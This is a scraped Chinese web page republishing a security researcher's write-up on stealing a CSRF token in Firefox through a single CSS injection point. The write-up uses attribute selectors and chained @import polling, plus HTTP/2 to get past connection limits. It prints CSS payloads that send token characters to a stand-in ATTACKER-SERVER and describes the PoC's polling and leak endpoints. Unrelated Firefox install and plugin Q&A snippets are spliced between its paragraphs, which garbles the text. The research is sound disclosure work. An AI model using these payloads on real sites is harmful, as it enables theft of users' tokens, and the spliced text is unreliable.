在Firefox浏览器中利用CSS窃取数据_CSS教程_CSS_网页制作

来源:脚本之家  责任编辑:小易  

我遇到了与你同样的问题,新版的火狐浏览器直接安装C盘,解决办法:在双击安装包后,直接开始安装,在没安装完成的任意时候点击右上角的×号,接下来就看你的造化了,就可以自定义了,1.进入火狐浏览器官方网站,点击更多系统和语言下载2.根据自己系统位zhidao数,点击 ,  点击下载完整版火狐浏览器安装包(64位系统)或者32位(32位系统)怎么看电脑是32位还是64位3.双击安装包,待其进度条走完后,点击下一步4.点击自定义,再次点击下一步5.点击浏览,选择自己要安装的版文件夹,点击确定,再次点击下一步6.根据自己需要权选择是否安装维护服务,点击下一步7.根据自己需要选择,点击下一步8.根据自己需要选择,点击下一步9.安装过程及完成图,一.原因:其实安装的时候要选择安装类型。标准安装不可以选择安装位置,默认是在c盘,自定义安装可以选择安装位置。二.方法如下:下载安装包。百度“火狐浏览器官方下载”,下zhidao载即可。双击安装包,运行。进入浏览器的安装界面,点击下一步。这里选择安装类型。标准安装不可以选择安装位置回,默认是在c盘,自定义安装可以选择安装位置。这里选择“自定义安装”,点击下一步。这里选择安装位置,点击“浏览”。选择要安装的位置后,点击“确定”后,点击“下一步”。进入安装“安装维护服务”界面。如果不需要维护可以不勾选,需要的话勾选上。选择浏览器的图标位置。确定信息,和是否让firefox作为你的默认浏览器,如果作为默认浏览器,打开一个连接就是用火狐打开的答。点击“安装”,出现一个进度条。安装完成www.zgxue.com防采集请勿采集本网。

0x00 前言

微软的IE6+安装完毕以后,firefox就会出现以下的内容,这样就可以直接在Firefox中保持你mht了。firefox->>>tools->>>Add-ons->>>>Get Add-ons->>>>search maf->>>from search result,select maf

几个月之前,我在Firefox中找到了一个漏洞( CVE-2019-17016 )。在研究过程中,我发现了在Firefox浏览器中利用CSS的一种数据窃取技术,可以通过单个注入点窃取数据,这里我想与大家一起分享相关研究成果。

不能 除了IE或者ie内核的浏览器都不可以

0x01 背景知识

火狐一般不支持javascipt和A脚本语言,只要语句对,用IE肯定正常

为了演示方便,这里假设我们想窃取 <input> 元素中的CSRF令牌。

NAAPI插件能在火狐浏览器中加载,在oprea浏览器中可以看到,但是加载不了,如图所示;NAAPI插件能在火狐浏览器中加载,在oprea浏览器中可以-知识宝库

<input type="hidden" name="csrftoken" value="SOME_VALUE">

Mozilla Firefox,中文称'火狐'浏览器,是一个完全开放源代码,任何人都可以自由参与开发的,支持多种操作系统的浏览器,因为其强大的 可定制性和丰富的扩展程序而成为最有个性的浏览器,可以说,每个

我们无法使用脚本(可能是因为CSP),因此想寻找基于样式的注入方法。传统方法是使用属性选择器,如下所示:

input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a);}input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b);}...input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z);}

如果应用了CSS规则,那么攻击者就能收到HTTP请求,从而获取到令牌的第1个字符。随后,攻击者需要准备另一个样式表,其中包含已窃取的第1个字符,如下所示:

input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa);}input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab);}...input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az);}

通常情况下,攻击者需要重新加载 <iframe> 中已加载的页面,以便提供后续样式表。

在2018年, Pepe Vila 提出了一个非常不错的想法,可以在Chrome浏览器中滥用 CSS递归import 方式,通过单个注入点完成相同任务。在2019年,Nathanial Lattimer( @d0nutptr )重新提出了相同 技巧 ,但稍微做了点改动。下面我稍微总结一下Lattimer的方法,这种方法与本文的思想比较接近(但我在此次研究过程中并不了解Lattimer之前的成果,因此可能有人会认为我在重复造轮子)。

简而言之,第一次注入用到了一堆 import

@import url(//ATTACKER-SERVER/polling?len=0);@import url(//ATTACKER-SERVER/polling?len=1);@import url(//ATTACKER-SERVER/polling?len=2);...

核心思想如下:

1、在一开始,只有第1个 @import 会返回样式表,其他语句处于连接阻塞状态。

2、第1个 @import 返回样式表,泄露令牌的第1个字符。

3、当泄露的第1个令牌到达 ATTACKER-SERVER ,第2个 import 停止阻塞,返回包含第1个字符的样式表,尝试泄露第2个字符。

4、当第2个泄露字符到达 ATTACKER-SERVER 时,第3个 import 停止阻塞……以此类推。

这种技术之所以行之有效,是因为Chrome会采用异步方式处理 import ,因此当任何 import 停止阻塞时,Chrome会立即解析该语句并应用规则。

0x02 Firefox及样式表处理

前面提到的方法并不适用于Firefox,与Chrome浏览器相比,Firefox对样式表的处理方式大不相同。这里我以几个案例来说明其中差异。

首先,Firefox会采用同步方式处理样式表。因此,当样式表中有多个 import 时,只有当所有 import 都处理完毕时,Firefox才会应用CSS规则。考虑如下案例:

<style>@import '/polling/0';@import '/polling/1';@import '/polling/2';</style>

假设第1个 @import 返回CSS规则,将页面背景设置为蓝色,后续的 import 处于阻塞状态(比如永远不会返回任何内容,会挂起HTTP连接)。在Chrome浏览器中,页面会立即变为蓝色,而在Firefox中并不会有任何反应。

我们可以将所有 import 放在独立的 <style> 元素中,从而解决该问题:

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>

在上面代码中,Firefox会分别处理所有样式表,因此页面会立刻变蓝色,其他 import 会在后台处理。

但这里还有另一个问题,假设我们想窃取包含10个字符的令牌:

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>...<style>@import '/polling/10';</style>

Firefox会立即将10个 import 加入队列。在处理完第1个 import 后,Firefox会将带有已知字符的另一个请求加入队列。这里的问题在于,该请求会被加到队列末尾。而在默认情况下,浏览器有个限制条件,到同一个服务器只能有6个并发连接。因此,带有已知字符的请求永远不会到达目标服务器,因为已经有到该服务器的6个阻塞连接,最终出现死锁现象。

0x03 HTTP/2

6个连接的限制条件由TCP层决定,因此到单个服务器只能有6个TCP连接同时存在。在这种情况下,我认为HTTP/2可能派上用场。HTTP/2有许多优点,比如我们可以通过单个连接发送多个HTTP请求(也就是所谓的多路传输( multiplexing )),从而大大提升性能。

Firefox对单个HTTP/2连接的并发请求数也有限制,但默认情况下限制数为 100 (具体设置参考 about:config 中的 network.http.spdy.default-concurrent )。如果我们需要更多并发数,可以使用不同的主机名,强制Firefox创建第2个TCP连接。比如,如果我们创建到 https://localhost:3000100 个请求,也创建到 https://127.0.0.1:300050 个请求,此时Firefox就会创建2个TCP连接。

0x04 利用方式

现在一切准备就绪,我们的主要利用场景如下:

1、利用代码基于HTTP/2。

2、通过 /polling/:session/:index 端点可以返回CSS,泄露第 :index 字符。该请求会处于阻塞状态,直到前一个请求成功泄露第 index-1 个字符。 :session 路径参数用来区分多次攻击行为。

3、通过 /leak/:session/:value 端点来泄露整个令牌。这里 :value 为获取到的完整值,而不单单是最后一个字符。

4、为了强制Firefox向同一个服务器发起2个TCP连接,这里用到了两个端点,分别为 https://localhost:3000https://127.0.0.1:3000

5、端点 /generate 用来生成示例代码。

我创建了一个 测试平台 ,目标是通过这种方式窃取 csrftoken ,大家可通过 此处 直接访问该平台。

此外,我还在GitHub上托管了 PoC代码 ,攻击过程可参考 此处视频 。

有趣的是,由于我们使用的是HTTP/2,因此攻击过程非常快速,不到3秒就能获取到整个令牌。

0x05 总结

在本文中,我演示了如何利用1个注入点,在不想重载页面的情况下,通过CSS窃取数据。这里主要涉及2个要点:

1、将 @import 规则拆分成多个样式表,后续 import 不会阻塞浏览器对整个样式表的处理。

2、为了绕过TCP并发连接数限制,我们需要通过HTTP/2发起攻击。

以上所述是小编给大家介绍的在Firefox浏览器中利用CSS窃取数据,希望对大家有所帮助,也非常感谢大家对真格学网网站的支持!

 

尊敬的用户,您好!很高兴为您答疑。导致这个问题最大的可能是test.html里面的转译字符,而火狐对这个问题不敏感,故而不会出问题。希望我的回答对您有所帮助,如有疑问,欢迎继续咨询我们内容来自www.zgxue.com请勿采集。


  • 本文相关:
  • css 实现渐变效果小结( linear-gradient线性渐变 和 radial-gradient径
  • 解决type=file 文件修改表单 名称不能正常回显的问题
  • 移动端前端适配方案(总结)
  • css 横向进度条和竖向进度条实现代码
  • css运用阿里巴巴矢量库快速在对应位置加上好看的图标效果(实例代码)
  • 详解盒模型大小取决于它的padding,margin,border数值
  • css+svg实现b站充电效果的示例代码
  • css动画实现领积分效果的思路详解
  • html/css中的空格处理及如何保留页面中的空格
  • css 实现小尖角聊天对话框带尖角的说话泡泡效果
  • jquery的load方法,在火狐浏览器可以使用,在其他浏览器都不能用
  • 为什么firefox浏览器只能装在C盘中
  • 为什么用火狐浏览器不能上网,用其他浏览器就可以?
  • 如何在火狐浏览器中启用Java
  • 如何利用firefox浏览器打开.mht文件
  • 非IE浏览器请使用CTRL+C进行复制,火狐浏览器能直接复制,而不是用CTRL+复制吗
  • 利用ajax 在后台拼凑产生的select下option拉框, 在火狐浏览器中一闪,怎么解决
  • NAAPI插件能在火狐浏览器中加载,在oprea浏览器中可以看到,但是加载不了,如图所示;
  • 你也想要放弃使用firefox浏览器了吗?
  • 如何在火狐浏览器中去掉“将火狐设为默认浏览器”的按钮?
  • 网站首页网页制作脚本下载服务器操作系统网站运营平面设计媒体动画电脑基础硬件教程网络安全主页网页制作csscss教程firefoxcss移动端前端适配方案(总结)css运用阿里巴巴矢量库快速在对应位置加上好看的图标效果(实例代码)css动画实现领积分效果的思路详解css 实现小尖角聊天对话框带尖角的说话泡泡效果css教程css3div+css教程web标准教程浏览器兼容教程css布局实例css控制ul li 的样式详解(推荐)html设置超链接字体颜色和点击后的字体颜色div水平垂直居中的完美解决方案css设置各种中文字体如雅黑、黑体、宋体、楷体等等css 文本字体颜色设置方法(css color)css 漂亮搜索框美化代码css自定义select下拉选择框的样式(不用其他标签模拟)css圆角效果 -webkit-border-radius(css3中border-radcss 中的background:transparent到底是什么意思有什么css 首行缩进两个文字css 实现渐变效果小结( linear-gradient线性渐变 和 r解决type=file 文件修改表单 名称不能正常回显的问题移动端前端适配方案(总结)css 横向进度条和竖向进度条实现代码css运用阿里巴巴矢量库快速在对应位置加上好看的图标详解盒模型大小取决于它的padding,margin,border数css+svg实现b站充电效果的示例代码css动画实现领积分效果的思路详解html/css中的空格处理及如何保留页面中的空格css实现气泡的小尖角效果
    免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2017 www.zgxue.com All Rights Reserved